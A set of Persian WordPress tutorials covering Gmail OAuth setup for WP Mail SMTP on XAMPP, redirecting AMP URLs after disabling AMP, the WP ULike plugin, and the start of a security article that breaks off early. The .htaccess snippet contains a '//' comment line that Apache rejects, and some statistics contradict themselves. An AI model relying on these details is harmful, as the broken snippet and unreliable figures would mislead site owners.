یکی از مشکلاتی که کاربران دارند این است که به دلیل اینکه در لوکال هاست به صورت پیشفرض امکان ارسال ایمیل را ندارند مجبور هستند بعد از اینکه اقدام به انتقال وردپرس از لوکال هاست به هاست کردند کارهایی که مربوط به ایمیل است را در هاست دنبال کنند. پیش از این در آموزش ارسال ایمیل در لوکال هاست به معرفی افزونه‌ای برای این کار پرداختیم. اما ظاهرا این افزونه برای استفاده در لوکال هاست زمپ دارای مشکل است و در نسخه ویندوزهای 64 بیت نمیتوان از آن استفاده کرد. بنابراین در این آموزش از پایگاه دانش میزبان‌فا قصد دارم به معرفی افزونه دیگری برای ارسال ایمیل در لوکال هاست بپردازم که با استفاده از آن می‌توانید از امکان ارسال ایمیل در لوکال هاست زمپ استفاده کنید.

آموزش رفع مشکل ارسال ایمیل در لوکال هاست زمپ وردپرس

طی گزارشات ارسالی کاربران در برنامه لوکال هاست XAMPP مشکلی وجود دارد که با استفاده از افزونه Easy WP SMTP نمیتوان ایمیل ارسال کرد. به دلیل اینکه در برنامه لوکال هاست زمپ از توابع خود php برای ارسال ایمیل استفاده می‌شود این توابع فقط و فقط در نسخه 32 بیتی ویندوز کار می‌کنند و امکان ارسال ایمیل در لوکال هاست را خواهید داشت. اما افرادی که از نسخه 64 بیتی ویندوز استفاده می‌کنند با این روش قادر به ارسال ایمیل در لوکال هاست نخواهند بود. بنابراین بهتر است از افزونه دیگری استفاده کنید که امکان ارسال ایمیل را به شما خواهد داد. افزونه‌ای که برای نسخه‌های 64 بیتی ویندوز در لوکال هاست زمپ امکان ارسال ایمیل را خواهد داد با نام wp mail smtp در مخزن وردپرس به ثبت رسیده است. این افزونه تا به امروز موفق شده است بیش از 900.000 نصب فعال و کسب امتیاز 4.5 را ازآن خود کند که با استفاده از آن قادر به ارسال ایمیل در لوکال هاست زمپ خواهید بود. ابتدا افزونه را با کلیک روی دکمه زیر دانلود کنید و سپس اقدام به نصب افزونه بکنید.

دانلود افزونه WP Mail SMTP by WPForms

بعد از نصب و فعال سازی افزونه مشابه تصویر زیر منویی با نام ایمیل در بخش تنظیمات وردپرس افزوده خواهد شد. روی این منو کلیک کنید تا به صفحه تنظیمات افزونه SMTP وردپرس هدایت شوید.

ارسال ایمیل در لوکال هاست وردپرس | تنظیمات ایمیل وردپرس در لوکال هاست

ابتدا در فیلد ایمیل ارسال کننده آدرس جیمیل خود را وارد کنید و سپس در بخش نام ارسال کننده یک نام برای ارسال کننده ایمیل انتخاب کنید. در مرحله بعد برای اینکه ایمیل ارسالی از سوی API گوگل در لوکال هاست ارسال شود گزینه گوگل را از بخش ارسال کننده ایمیل انتخاب کنید. در نهایت برای اینکه مشخص شود ایمیل‌های ارسال نشده چه وضعیتی دارند حتما گزینه مسیر بازگشت را فعال کنید.

حالا برای اینکه ایمیل ارسالی از طریق API گوگل ارسال شوند باید به کنسول جستجوی گوگل مراجعه کرده و یک Client ID و Client Secret ایجاد کنید. برای این منظور به صفحه کنسول گوگل مراجعه کنید. حالا باید یک پروژه برای این کار در کنسول گوگل ایجاد کنید. بنابراین روی گزینه New Project که مشابه تصویر زیر آن را می‌بینید کلیک کنید.

ارسال ایمیل در لوکال هاست وردپرس | تنظیمات ایمیل وردپرس در لوکال هاست

در مرحله بعد صفحه زیر برای شما باز میشه که باید یک نام برای پروژه خودتون انتخاب کنید. نام را وارد کرده و منتظر بمونید تا اگر خطایی داده نشد در نهایت روی دکمه Create کلیک کنید تا پروژه ایجاد بشه.

ارسال ایمیل در لوکال هاست وردپرس | تنظیمات ایمیل وردپرس در لوکال هاست

بعد از اینکه پروژه ایجاد شد از منوی بالایی پروژه را انتخاب کرده و سپس از منوی کشویی سمت چپ روی گزینه Dashboard کلیک کنید تا صفحه زیر نمایش داده شود. حالا روی گزینه Gmail API کلیک کنید.

ارسال ایمیل در لوکال هاست وردپرس | تنظیمات ایمیل وردپرس در لوکال هاست

در مرحله بعد وارد صفحه‌ای خواهید شد که باید API پروزه را برای جیمیل فعال کنید. بنابراین مشابه تصویر زیر بعد از نمایان شدن دکمه‌ها گزینه Enable را انتخاب کرده و منتظر بمانید تا فعال شود.

ارسال ایمیل در لوکال هاست وردپرس | تنظیمات ایمیل وردپرس در لوکال هاست

بعد از فعال شدن پروژه صفحه زیر نمایش داده خواهد شد که باید در آن روی دکمه Create credentials کلیک کنید.

ارسال ایمیل در لوکال هاست وردپرس | تنظیمات ایمیل وردپرس در لوکال هاست

با کلیک روی این دکمه به صفحه زیر هدایت خواهید شد که باید در ان نوع استفاده خود را به همراه سایر جزییات وارد کنید. بنابراین مشابه تصویر زیر ابتدا گزینه Where will you be calling the API from? را روی حالت web browser انتخاب کنید. گزینه What data will you be accessing? را هم روی حالت User Data قرار داده و در نهایت روی دکمه What credentials do I need? کلیک کنید.

ارسال ایمیل در لوکال هاست وردپرس | تنظیمات ایمیل وردپرس در لوکال هاست

حالا به صفحه تنظیمات افزونه در وردپرس برگشته و مشابه تصویر زیر آدرسی که در گزینه Authorized redirect URI قرار دارد را کپی کنید.

ارسال ایمیل در لوکال هاست وردپرس | تنظیمات ایمیل وردپرس در لوکال هاست

حالا مجددا به کنسول گوگل مراجعه کرده و مشابه تصویر زیر ابتدا در فیلد Name یک نام وارد کنید. سپس در فیلد Authorized JavaScript origins آدرس لوکال هاست یا دامنه خود را وارد کنید. و در نهایت آدرسی که از صفحه تنظیمات افزونه کپی کردید را در فیلد Authorized redirect URIs قرار داده و روی دکمه Create client ID کلیک کنید.

ارسال ایمیل در لوکال هاست وردپرس | تنظیمات ایمیل وردپرس در لوکال هاست

در مرحله بعد در فیلد Product name shown to users نیز نام دلخواه خود را که میتونه همون نام پروژه باشه وارد کرده و روی دکمه Continue کلیک کنید.

ارسال ایمیل در لوکال هاست وردپرس | تنظیمات ایمیل وردپرس در لوکال هاست

در نهایت بعد از اینکه کلیه مراحل به درستی طی شدند Client ID تولید خواهد شد. مشابه تصویر زیر اونو کپی کرده و در نهایت روی دکمه Done کلیک کنید.

ارسال ایمیل در لوکال هاست وردپرس | تنظیمات ایمیل وردپرس در لوکال هاست

بعد از این مرحله صفحه زیر براتون باز میشه که باید در اون روی آیکون ویرایش کلیک کنید.

ارسال ایمیل در لوکال هاست وردپرس | تنظیمات ایمیل وردپرس در لوکال هاست

با کلیک روی آیکون ویرایش در صفحه بعدی Client ID و Client Secret به شما نمایش داده میشه که باید اونها را کپی کرده و در تنظیمات افزونه که مربوط به این دو فیلد هست وارد کنید.

ارسال ایمیل در لوکال هاست وردپرس | تنظیمات ایمیل وردپرس در لوکال هاست

بعد از وارد کردن در تنظیمات و ذخیره این دو گزینه دکمه‌ای مشابه تصویر زیر در صفحه تنظیمات افزونه با نام اجازه به افزونه برای ارسال ایمیل با استفاده از حساب کاربری گوگل شما نمایش داده میشه که باید روی این دکمه کلیک کنید.

ارسال ایمیل در لوکال هاست وردپرس | تنظیمات ایمیل وردپرس در لوکال هاست

در مرحله بعد به صفحه ورود به اکانت جیمیل هدایت خواهید شد. در این مرحله باید با همین اکانتی که پروژه را ایجاد کردید وارد گوگل شوید. بنابراین همان اکانت جیمیل را انتخاب کنید و منتظر بمانید تا صفحه لود شود.

ارسال ایمیل در لوکال هاست وردپرس | تنظیمات ایمیل وردپرس در لوکال هاست

بعد از انتخاب اکانت جیمیل صفحه زیر نمایش داده میشه که باید روی دکمه ALLOW برای دادن دسترسی در جهت ارسال ایمیل در لوکال هاست وردپرس کلیک کنید.

ارسال ایمیل در لوکال هاست وردپرس | تنظیمات ایمیل وردپرس در لوکال هاست

بعد از دادن دسترسی به پیشخوان وردپرس برگشت داده میشید که در صورت درست طی کردن همه مراحل پیغام زیر نمایش داده خواهد شد.

ارسال ایمیل در لوکال هاست وردپرس | تنظیمات ایمیل وردپرس در لوکال هاست

حالا برای اطمینان از اینکه ایمیل‌ها به درستی ارسال می‌شوند به تب آزمایش ایمیل مراجعه کرده و آدرس ایمیلی را برای تست ارسال ایمیل در لوکال هاست وردپرس وارد کنید و روی دکمه ارسال ایمیل کلیک کنید. خواهید دید که ایمیل ارسالی را از طریق لوکال هاست دریافت خواهید کرد.

ارسال ایمیل در لوکال هاست وردپرس | تنظیمات ایمیل وردپرس در لوکال هاست

با مراجعه به تب متفرقه هم میتونید کلیه اعلان‌ها و جزئیات مربوط به به‌روزرسانی افزونه را در حالت مخفی قرار دهید تا ایمیلی در این حالت برای شما ارسال نشود.

امیدوارم که این آموزش هم مورد توجه و پسند شما قرار گرفته باشه و با استفاده از اون تونسته باشید تا امکان ارسال ایمیل با استفاده از SMTP را در لوکال هاست زمپ فراهم کنید. در صورتی که در رابطه با این آموزش و نحوه ارسال ایمیل در لوکال هاست زمپ وردپرس سوال یا مشکلی داشتید در بخش دیدگاه‌ها اعلام کنید تا در کوتاه‌ترین زمان ممکن پاسخگوی شما باشم.

نوشته آموزش رفع مشکل ارسال ایمیل در لوکال هاست وردپرس اولین بار در پدیدار شد.


آموزش غیرفعال کردن AMP وردپرس

$
0
0

AMP وردپرس پروژه‌ای است که چند سال پیش از سمت گوگل برای دسترسی به سایت‌ها با سرعت بیشتری ساخته شد. پروژه Google AMP این امکان را به شما میده تا نسخه‌ای از سایت را روی موبایل به کاربران خودتون نمایش بدین که با استفاده از اون قادر باشند با هر سرعت اینترنتی که دارند محتوای نوشته را مشاهده کنند. اطلاعات میتونه تا شامل نام سایت، لوگو سایت، عنوان نوشته، محتوای نوشته، دسته‌بندی و… باشه و از اونجایی که قالب‌های استفاده شده در سایت دارای استایل مختلف و فایل‌های گوناگونی هستند همین موضوع باعث لود دیرتر صفحات میشه. اما چون در نسخه amp سایت به این بخش‌ها نیازی نیست پس صرفا اطلاعات ضروری در نسخه amp یک سایت به صورت کاملا ساده نمایش داده خواهد شد.

استفاده از AMP وردپرس در سایت چیزی نیست که از طرف گوگل اجباری روی اون قرار داشته باشه و استفاده کردن از amp یا نکردن اون بر اساس آخرین تغییرات الگوریتم گوگل تاثیری روی سئو سایت ندارد و تنها مزیت AMP در دسترسی سریعتر به صفحات سایت است. اما گاهی اوقات پیش میاد که به هر دلیل مجبور میشید نسخه AMP وردپرس را در سایت خودتون غیرفعال کنید. به عنوان مثال خود من که در حال استفاده از amp در وردپرس بودم با بررسی آمار سایت دیدم که بانس ریت سایت در حد قابل قبولی نیست و به این دلیل که سایر مطالب در نسخه amp به کاربر پیشناد نمیشه سریعا سایت را ترک می‌کنند. پس این شد که تصمیم به غیرفعال کردن آن گرفتم.

در این آموزش از پایگاه دانش میزبان‌فا قصد دارم به معرفی نحوه غیرفعال کردن AMP در وردپرس بپردازم که با استفاده از این روش میتونید amp وردپرس را در سایت خودتون بدون از دست دادن سئو و مواجه با خطای 404 غیرفعال کنید. پس اگر شما هم با کاهش بانس ریت در سایت مواجه شدید یا به هر دلیل دیگه قصد ندارید از AMP گوگل در وردپرس استفاده کنید تا انتهای این آموزش همراه ما باشید.

دلیل غیرفعال کردن AMP وردپرس

قبل از اینکه به نحوه غیرفعال کردن amp در وردپرس بدون افت سئو سایت بپردازم به برخی دلایل که ممکنه شما هم با دیدن این دلایل تصمیم به غیرفعال کردن AMP در وردپرس بکنید اشاره می‌کنم. یکی از نشریات آنلاین دلیل عدم استفاده از amp در سایت خودش را به این صورت معرفی کرده بود که، به نظر می‌رسد میزان ترافیک تقریبا یکسان است و تغییر محسوسی در آن مشاهده نشده، از آنجایی که AMP ما را محدود کرده بود و نمی‌توانستیم فیلدها و بخش‌های مختلفی را نمایش دهیم، اما تاکنون با غیرفعال کردن amp فیدبک خوبی داشته‌ایم.

به دلیل غیرفعال بودن منوهای سایت در AMP کاربران قادر به مشاهده سایر صفحات نیستند. یا اینکه وقتی در بیشتر قالب‌ها در انتهای نوشته مطالب مرتبط و پیشنهادی نمایش داده می‌شود با استفاده کردن از AMP خبری از طراحی بصری نیست که کلیک روی آنها افزایشی داشته باشد. بنابراین به محض اتمام شدن خواندن نوشته کاربران از سایت خارج شده و با کاهش شدید Bounce Rate در سایت مواجه می‌شوید. برای خود من در یک وبلاگ شخصی هنگام استفاده از AMP در وردپرس متوسط زمان حضور کاربر در سایت چیزی در حدود 3 دقیقه و Bounce Rate 87 را داشتم که بعد از غیرفعال کردن آن و مشاهده آمار این ارقام افزایش یافتند. به طوری که متوسط زمان حضور در سایت به 7 دقیقه و Bounce Rate نیز به 91 درصد رسید.

در صورتی که دلیل شما بخاطر نمایش ندادن فرم هست باید بدونید که قابلیتی در AMP هست که میتونید برای یک نوشته یا برگه خاص تعیین کنید که نسخه AMP سایت نمایش داده نشود. اما اگر دلیل شما بخاطر کاهش بانس ریت هست غیرفعال کردن کلی اون مورد نیاز خواهد بود.

غیرفعال کردن AMP وردپرس بدون افت سئو

حال که بر اساس دلایل بالا تصمیم به غیرفعال کردن amp در وردپرس گرفتید در ادامه به نحوه غیرفعال کردن AMP در وردپرس می‌پردازم. برای شروع کار ابتدا باید افزونه‌های مربوط به AMP وردپرس را غیرفعال کنید. اگر با استفاده از آموزش ساخت AMP در وردپرس اقدام به نصب کرده‌اید لازم است افزونه‌های AMP و Glue for Yoast SEO & AMP را غیرفعال کنید.

از انجایی که لود سایت در AMP گوگل برای تمام صفحات به شکلی انجام می‌گیرد که با اضافه کردن /amp/ به انتهای صفحات می‌تواند نسخه amp سایت را دید بنابراین در نتایج گوگل وقتی کاربری روی آدرس سایت شما که به صورت AMP می‌باشد و آیکون آن نیز نمایش داده می‌شود، بعد از غیرفعال کردن دو افزونه فوق با صفحه 404 وردپرس مواجه خواهد شد. پس اولین مشکلی که پیش آمده خطای 404 در وردپرس است که باید کاری کنیم کاربران به صورت خودکار از صفحه AMP به صفحه نوشته هدایت شوند. برای اینکه ریدایرکت کاربران به صورت اصولی و حفظ سئو انجام بشه لازمه که لینک‌ها به صورت ریدایرکت 301 در وردپرس انجام گیرند. که برای انجام این کار دو راه دارید.

روش اول: استفاده از فایل htaccess.

شخصا استفاده از کد برای ریدایرکت کاربران با استفاده از فایل htaccess. را می‌پسندم. با استفاده از این روش کافیه کد زیر را در فایل htaccess. هاست خودتون قرار بدین تا کار ریدایرکت کاربران در سایت از نسخه AMP صفحات به نسخه اصلی سایت به صورت ریدایرکت 301 انجام بگیره. بنابراین وارد هاست خود شده و روی گزینه File Manager کلیک کنید. سپس وارد public_html شده و به دنبال فایل htaccess. بگردید. این فایل جزو فایل‌های مخفی است، اگر نمایش داده نشد روی دکمه Settings در بالاس صفحه سمت راست کلیک کنید تا پنجره زیر باز شده و سپس گزینه Show hidden Files را انتخاب کنید.

غیرفعال کردن AMP وردپرس و غیرفعال کردن Google AMP بدون افت سئو

بعد از کلیک روی دکمه Save فایل نمایش داده خواهد شد. حالا روی فایل راست کلیک کرده و گزینه Edit را انتخاب کنید و کدهای زیر را در مکان مناسبی از این فایل قرار دهید.

// Redirect AMP to non-AMP 
RewriteEngine On
RewriteCond %{REQUEST_URI} (.+)/amp(.*)$
RewriteRule ^ %1/ [R=301,L]

بعد از قرار دادن این کد و ذخیره فایل حالا آدرس یکی از نوشته‌های سایت را باز کرده و /amp/ را به انتهای آن اضافه کنید. خواهید دید که با مراجعه به این آدرس دیگر صفحه 404 نمایش داده نشده و به صفحه همان نوشته هدایت خواهید شد. بعد از اینکه کلیه لینک‌های صفحات در نتایج جستجو اصلاح شدند و دیگه آیکون AMP گوگل در کنار آدرس سایت شما نمایش داده نشد میتونید کد بالا را از فایل htaccess. بردارید. معمولا این کار بستگی به تعداد صفحات ایندکس شده سایت شما خواهد داشت و مدتی زمانبر است.

روش دوم: استفاده از افزونه

افزونه‌ای که برای ریدایرکت کاربران در وردپرس قصد معرفی اونو دارم با نام Redirection در مخزن وردپرس به ثبت رسیده و تاکنون تونسته بیش از یک میلیون نصب فعال و کسب امتیاز 402 را ازآن خودش بکنه که با استفاده از این افزونه میتونید امکان ریدایرکت کاربران را از صفحه AMP به صفحه اصلی در سایت فراهم کنید. برای استفاده از این افزونه روی دکمه زیر کلیک کنید تا به صفحه افزونه در مخزن وردپرس هدایت شوید و سپس با استفاده از آموزش نحوه نصب و کار کردن با افزونه ها در وردپرس اقدام به نصب و فعال سازی افزونه بکنید.

دانلود افزونه Redirection

بعد از نصب و فعال سازی افزونه مشابه تصویر زیر منویی با نام Redirection در بخش ابزارها پیشخوان وردپرس اضافه خواهد شد. روی این منو کلیک کنید تا به صفحه افزونه برای اضافه کردن ریدایرکت 301 در وردپرس هدایت شوید.

غیرفعال کردن AMP وردپرس و غیرفعال کردن Google AMP بدون افت سئو

Source URL: ابتدا در این فیلد کد زیر را قرار دهید. دقت کنید که حتما کد را از اینجا کپی کنید، چرا که به دلیل چینش زبان راست به چپ ممکنه اشتباه وارد کنید.

/(.*)\/amp

Target URL: در این فیلد هم آدرس سایت خودتون را وارد کرده و بعد از / از کاراکتر 1$ استفاده کنید. در اینجا هم آدرس را کپی کنید و به جای site.com آدرس دامنه خودتون را وارد کنید.

http://example.com/$1

در صورتی که اقدام به نصب SSL در وردپرس کردید فراموش نکنید که حتما آدرس را همراه با پروتکل امن HTTPS وارد کنید. در نهایت تیک گزینه Regex را فعال کنید. سپس روی دکمه Add Redirect کلیک کنید. کار به اتمام رسیده و از این پس لینک‌های AMP در سایت به خود نوشته ریدایرکت خواهند شد. برای اطمینان از اینکه کار به دستی انجام شده به انتهای آدرس یکی از نوشته‌ها /amp/ را اضافه کنید، اگر ریدایرکت شدید همه چیز به درستی انجام شده است.

امیدوارم که این آموزش هم مورد توجه و پسند شما قرار گرفته باشه و با استفاده از اون تونسته باشید اقدام به غیرفعال کردن AMP گوگل در وردپرس بکنید. در صورتی که در رابطه با این آموزش و نحوه غیرفعال کردن نسخه AMP وردپرس سوال یا مشکلی داشتید در بخش دیدگاه ها اعلام کنید تا در کوتاه‌ترین زمان ممکن پاسخگوی شما باشم.

نوشته آموزش غیرفعال کردن AMP وردپرس اولین بار در پدیدار شد.

آموزش لایک و دیس لایک مطالب و نظرات وردپرس

$
0
0

لایک و دیس لایک مطالب و نظرات وردپرس یکی از نیازهایی هست که برای دریافت بازخورد از مطالب سایتمون به چنین قابلیتی نیاز داریم. در بیشتر مواقع کاربران سایت بخاطر اینکه فرم نظرات وردپرس را پر کنند کلا میونه خوبی با دادن نظر در سایت ندارند بنابراین میتونیم درست مثل شبکه‌های اجتماعی از قابلیت لایک و دیس لایک مطالب و حتی نظرات در وردپرس برای به دست آوردن بازخورد سایت استفاده کنیم. واژه لایک کلمه‌ای هست که این روزها به لطف شبکه‌های اجتماعی حسابی باهاش عجین شدیم و در هر شبکه اجتماعی مثل توییتر، اینستاگرام، فیسبوک و… از این قابلیت استفاده می‌کنیم که دلیل به وجود اومدن لایک و پسندیدن مطالب شبکه‌های اجتماعی هم درست به همین شکل بوده است.

در این آموزش از پایگاه دانش میزبان‌فا قصد معرفی افزونه لایک و دیس لایک مطالب و نظرات وردپرس را دارم که از هر افزونه این چنینی کاملا متفاوت بوده و بهترین گزینه انتخابی برای سایت شما خواهد بود. با استفاده از این افزونه میتونید امکان لایک و دیس لایک مطالب و نظرات را در وردپرس به صورت همزمان فراهم کنید.

افزونه لایک و دیس لایک وردپرس برای مطالب و نظرات وردپرس

افزونه‌ای که برای لایک و دیس لایک مطالب و نظرات وردپرس قصد دارم معرفی کنم با نام wp ulike در مخزن وردپرس به ثبت رسیده و تاکنون موفق شده بیش از 10.000 نصب فعال و کسب امتیاز 4.8 را ازآن خودش بکنه که با استفاده از این افزونه میتونید امکان پسندیدن و نپسندیدن مطالب و نظرات را در وردپرس فراهم کنید. نکته جالب دیگه اینه که این افزونه ایرانی هست و به همین دلیل کاملا با سایت شما سازگار خواهد بود. برای استفاده از این افزونه ابتدا روی دکمه زیر کلیک کنید تا به صفحه افزونه در مخزن وردپرس هدایت شده و سپس با استفاده از آموزش نحوه نصب و کار کردن با افزونه ها در وردپرس اقدام به نصب و فعال سازی این افزونه بکنید.

دانلود افزونه WP ULike

بعد از نصب و فعال سازی این افزونه مشابه تصویر زیر منویی با نام وردپرس یولایک در پیشخوان سایت وردپرسی شما اضافه میشه که با استفاده از اون میتونید هم تنظیمات افزونه را سفارشی سازی کنید و هم اینکه آخرین آمار لایک کاربران در وردپرس را ببینید.

افزونه لایک و دیس لایک وردپرس برای مطالب و نظرات وردپرس

حالت دکمه: با استفاده از این گزینه میتونید حالت دکمه را روی دو حالت آیکون یا نوشته قرار بدین که با کلیک روی اون کاربران قادر به لایک مطالب و نظرات در وردپرس باشند. در صورتی که حالا آیکون را انتخاب کرده باشید خود افزونه از دو آیکون قلب برای پسندیدن و لغو پسندیدن مطالب و نظرات استفاده می‌کنه که از بخش‌های آیکن دکمه (لایک) و آیکن دکمه ( لغو پسندیدن) میتونید آیکون تصویر دلخواه خودتون را در اندازه 16*16 پیکسل آپلود کنید.

اما اگر حالت دکمه روی متنی قرار داشته باشه فیلدهای متن دکمه (لایک) و متن دکمه ( لغو پسندیدن) نمایش داده میشه که باید نام دلخواه خودتون را برای دکمه پسندیدن و لغو پسندیدن مطالب و نظرات وردپرس وارد کنید.

متن تولتیپ دسترسی: در این فیلد میتونید متن دلخواه برای نمایش در حالتی که کاربر وارد نشده باشد را وارد کنید. این افزونه امکان لایک مطالب و نظرات را در حالتی که لازمه کاربران عضو شده باشند هم فراهم کرده که در صورت فعال بودن این گزینه اگر کاربر وارد نشده باشه این پیغام خطا به وی نمایش داده خواهد شد.

متن ورود کاربران: با استفاده از این گزینه میتونید متن نمایش ورود کاربران را در دو حالت جعبه‌ای یا نمیش روی دکمه لایک انتخاب کنید. سپس از قسمت متن ورود کاربران پیغام دلخواه را وارد کنید.

Disable Plugin Files: این گزینه امکانی فراهم میکنه که در صفحاتی خاص کاری کنید که فایل‌های افزونه برای پسندیدن اون محتوا بارگیری نشوند. بنابراین دکمه لایک و دیس لایک مطالب یا نظرات وردپرس در این صفحات نمایش داده نخواهند شد. این صفحات میتونه مثل صفحه اصلی، ووکامرس، آرشیو مطالب، برگه و… باشه که در تصویر میبینید.

فرمت اعداد: با فعال کردن این گزینه فرمت نمایش تعداد لایک به صورت رشته‌ای نمایش داده خواهد شد. یعنی مثلا اگر نوشته‌ای بالای 1.000 بار لایک خورده باشه به جای نمایش 1.000 به صورت 1000+ نمایش داده خواهد شد.

اطلاعیه ها: این گزینه هم باکس رنگی را با یک طراحی زیبا هنگام لایک یا دیس لایک کردن نظرات و مطالب وردپرس در گوشه سایت نشون میده که با استفاده از دو فیلد پیغام اطلاعیه پسندیدن و پیغام اطلاعیه لغو پسندیدن میتونید متن دلخواه خودتون را نمایش دهید.

افزونه لایک و دیس لایک وردپرس برای مطالب و نظرات وردپرس

قالب‌ها: با استفاده از این گزینه میتونید دکمه لایک را در سه حالت مختلف برای مطالب نمایش دهید.

نمایش خودکار: با غیر فعال کردن این گزینه میتونید دکمه لایک را از نوشته‌ها مخفی کنید.

محل قرار گیری در نمایش خودکار: با استفاده از این گزینه میتونید دکمه لایک را در سه حالت مختلف نمایش دهید.

فیلتر گذاری در نمایش خودکار: با انتخاب گزینه‌های موجود در این بخش دکمه لایک از این صفحات مخفی خواهد شد.

how to get google rich snippets: حتما سعی کنید از این گزینه استفاده کنید. با استفاده از این گزینه متاداده‌های مربوط به امتیاز دهی در نتایج جستجو در نوشته‌ها اعمال شده و امتیاز ستاره‌ای برای مطالب در نتایج جستجو نمایش داده خواهد شد.

دقت کنید که، اگر از افزونه نمایش امتیاز ستاره‌ای برای مطالب وردپرس استفاده می‌کنید که مطالب شما در نتایج گوگل همراه با امتیاز ستاره‌ای نمایش داده شوند این گزینه را غیرفعال کنید. چون در این صورت اختلال ایجاد شده و امتیاز در دو حالت ثبت خواهد شد.

محدودسازی لایک کاربران: با فعال کردن این گزینه فقط کاربرانی که در سایت ثبت نام کرده و وارد شده باشند امکان پسندیدن یا لغو پسندیدن مطالب و نظرات را در وردپرس دارند.

روش وقایع نگاری: با استفاده از این گزینه میتونید ملاک ثبت امتیاز را بر اساس نام کاربری، آی‌پی کاربر یا کوکی کاربر انتخاب کنید.

نمایش باکس کاربران لایک کرده: با فعال کردن این گزینه آواتار وردپرس کاربرانی که نوشته را لایک کرده باشند نمایش داده خواهد شد. برای استفاده از این قابلیت ابتدا گزینه را فعال کنید. سپس از قسمت سایز آوتار اندازه دلخواه برای اواتار را بر حسب پیکسل انتخاب کنید. سپس از قسمت تعداد کاربران قابل نمایش تعداد دلخواه را وارد کنید. در مرحله بعد با استفاده از شورت کدهایی که در بخش قالب جعبه لایک کاربران قرار داره میتونید اطلاعات دلخواه اضافی را هم به همراه کد وارد کنید تا نمایش داده شود.

حذف تمام وقایع و حذف تمام داده ها: در صورت انتخاب این گزینه‌ها به ترتیب آمار تعداد لایک‌های ثبت شده و داده‌های کلی افزونه پاک خواهند شد.

افزونه لایک و دیس لایک وردپرس برای مطالب و نظرات وردپرس

در بخش دیدگاه‌ها هم میتونید تنظیمات مربوط به لایک و دیس لایک نظرات را درست مثل نوشته‌ها مدیریت کنید با این تفاوت که گزینه نمایش در صفحه خاص و نمایش امتیاز ستاره‌ای در گوگل برای بخش نظرات وجود ندارد.

افزونه لایک و دیس لایک وردپرس برای مطالب و نظرات وردپرس

با رفتن به تب سفارشی سازی هم میتونید تنظیمات مربوط به رنگبندی و استایل دلخواه را برای دکمه لایک در وردپرس مدیریت کنید. برای استفاده از استایل سفارشی ابتدا باید گزینه سفارشی سازی را فعال کنید تا تنظیمات مشابه تصویر بالا نمایش داده شوند. سپس رنگ بندی دلخواه یا کد CSS دلخواه را برای افزونه انتخاب کرده و ذخیره کنید.

افزونه لایک و دیس لایک وردپرس برای مطالب و نظرات وردپرس

حالا اگر به صفحه یکی از نوشته‌ها مراجعه کنید می‌بینید که دکمه لایک مطالب و همچنین دکمه لایک نظرات در وردپرس اضافه شده که کاربران میتونند مطالب را لایک کنند. بعد از لایک مطالب هم امکان لغو پسندیدن فراهم هست. برای مشاهده آمار و تعداد لایک نوشته و دیدگاه در وردپرس هم کافیه مشابه تصویر زیر به منوی آماره وردپرس یولایک مراجعه کنید.

افزونه لایک و دیس لایک وردپرس برای مطالب و نظرات وردپرس

همانطور که در تصویر بالا می‌بینید گزارش کاملی بر اساس روز، هفته، ماه و… به همراه جزییات کامل کاربرانی که اقدام به لایک مطالب و لایک نظرات در وردپرس کرده‌اند نمایش داده خواهد شد.

امیدوارم که این آموزش هم مورد توجه و پسند شما قرار گرفته باشه و با استفاده از اون تونسته باشید اقدام به افزودن قابلیت لایک مطالب و نظرات در وردپرس بکنید. در صورتی که در رابطه با این افزونه سوال یا مشکلی داشتید در بخش دیدگاه‌ها اعلام کنید تا در کوتاه‌ترین زمان ممکن پاسخگوی شما باشم.

نوشته آموزش لایک و دیس لایک مطالب و نظرات وردپرس اولین بار در پدیدار شد.

آموزش تامین امنیت وردپرس و جلوگیری از هک وردپرس

$
0
0

یکی از دغدغه‌های مهم مدیران وردپرسی تامین امنیت وردپرس هست که نمیشه به سادگی از کنار این موضوع عبور کرد. وردپرس به دلیل محبوبیتی که در بین سیستم‌های سایت ساز داره همواره در معرض هک و نفوذ قرار داره که استفاده از وردپرس در بسیاری از سایت‌ها هم باعث بیشتر و بیشتر شدن موضوع هک سایت وردپرسی شده است. از اونجایی که بحث امنیت یک چیز نسبی هست و نمیشه گفت یک سیستم امنیت کامل داره بنابراین لازمه از تمامی راهکارهای موجود برای افزایش امنیت در وردپرس استفاده کنید.

در این مقاله از پایگاه دانش میزبان‌فا قصد دارم به معرفی راه‌های تامین امنیت وردپرس بپردازم که با استفاده کردن از این روش‌ها میتونید امنیت سایت خودتون را افزایش داده و از هر گونه نفوذ و هک در سایت تا حد بسیار بالایی جلوگیری کنید. پس اگر شما هم در امنیت سایتتون دچار مشکل شدید و از سوی برخی افراد مورد حمله قرار می‌گیرید تا انتهای این مقاله با ما همراه باشید تا با فعال کردن و اضافه کردن روش‌های امنیتی که در این مقاله با هم مرور می‌کنیم امنیت وردپرس را افزایش دهیم.

نحوه تامین امنیت وردپرس و جلوگیری از هک وردپرس

زمانی که یک سایت هک شده و مورد نفوذ قرار میگیره کلیه اطلاعات موجود در سایت مورد سرقت قرار خواهد گرفت. در بدترین شرایط برخی افراد بعد از نفوذ بدون اینکه چیزی متوجه بشید با قرار دادن کدهای مخرب در بخش‌های مختلف سایت کاری می‌کنند که اطلاعات سایت شما را به صورت دائمی استخراج کنند. در ظاهر همه چیز در سایت شما به درستی کار میکنه و مشکلی نمی‌بینید اما اطلاعات مهم سایت شما و کاربرانی که در سایتتون هستند مدام در حال درز کردن به جایی هست.

پس از همین ابتدا که شروع به نصب وردپرس می‌کنید لازمه کلیه روش‌های افزایش امنیت وردپرس را به کار ببندید و از هک سایت و نفوذ در وردپرس جلوگیری کنید. از طرفی هم تامین امنیت یک سایت صرفا محدود به سیستم مدیریت محتوا نبوده و به هاست و سرور شما هم بر میگرده که باید در سطح بالایی از نظر امنیتی قرار داشته باشد. بنابراین در قدم اول سعی کنید از هاستی استفاده کنید که امنیت بالایی داشته باشد. در مقالات بعدی به نحوه افزایش امنیت در هاست هم خواهم پرداخت.

 

1. به‌روز رسانی مداوم وردپرس

مهم ترین مسئله در تامین امنیت سایت‌های وردپرسی به روز بودن ورپرس و افزونه‌ها و قالب‌هایی هست که ازشون استفاده می‌کنید. تیم وردپرس مدام در حال افزودن قابلیت‌های جدید و رفع مشکلات و باگ‌های امنیتی این سیستم مدیریت محتوا است. پس وقتی وردپرس آپدیت می‌شود باید در اولین فرصت اقدام به آپدیت وردپرس بکنید. برای افزونه‌ها و قالب‌های استفاده شده هم باید به همین ترتیب عمل کرده و آنها را آپدیت کنید.

